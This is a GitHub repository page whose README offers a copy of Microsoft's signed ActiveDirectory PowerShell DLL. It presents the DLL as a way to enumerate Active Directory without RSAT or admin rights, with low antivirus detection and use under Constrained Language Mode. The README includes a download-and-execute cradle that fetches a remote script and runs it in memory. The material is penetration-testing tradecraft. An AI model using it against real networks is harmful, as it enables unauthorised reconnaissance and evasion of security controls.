Microsoft signed ActiveDirectory PowerShell module
Switch branches/tags
Nothing to show
Clone or download
Latest commit 19b94ce Nov 16, 2018
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
ActiveDirectory Inital Commit Oct 31, 2018
img Create AD_Module_Array.png Nov 16, 2018
Import-ActiveDirectory.ps1 Update Import-ActiveDirectory.ps1 Nov 16, 2018
Microsoft.ActiveDirectory.Management.dll Inital Commit Oct 31, 2018
README.md Update README.md Nov 16, 2018

README.md

ADModule

Microsoft signed DLL for the ActiveDirectory PowerShell module

Just a backup for the Microsoft's ActiveDirectory PowerShell module from Server 2016 with RSAT and module installed. The DLL is usually found at this path: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.ActiveDirectory.Management

and the rest of the module files at this path: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\ActiveDirectory\

Usage

You can copy this DLL to your machine and use it to enumerate Active Directory without installing RSAT and without having administrative privileges.

PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose Alt text

You can also use the Import-ActiveDirectory.ps1 (Thanks to PR by @D1iv3) to load the script using download-execute cradles and without writing the DLL to disk:

PS C:\> iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory Alt text

To be able to list all the cmdlets in the module, import the module as well. Remember to import the DLL first.

PS C:\> Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll -Verbose

PS C:\> Import-Module C:\AD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1

PS C:\> Get-Command -Module ActiveDirectory

Benefits

There are many benefits like very low chances of detection by AV, very wide coverage by cmdlets, good filters for cmdlets, signed by Microsoft etc. The most useful one, however, is that this module works flawlessly from PowerShell's Constrained Language Mode Alt text

Blog

https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html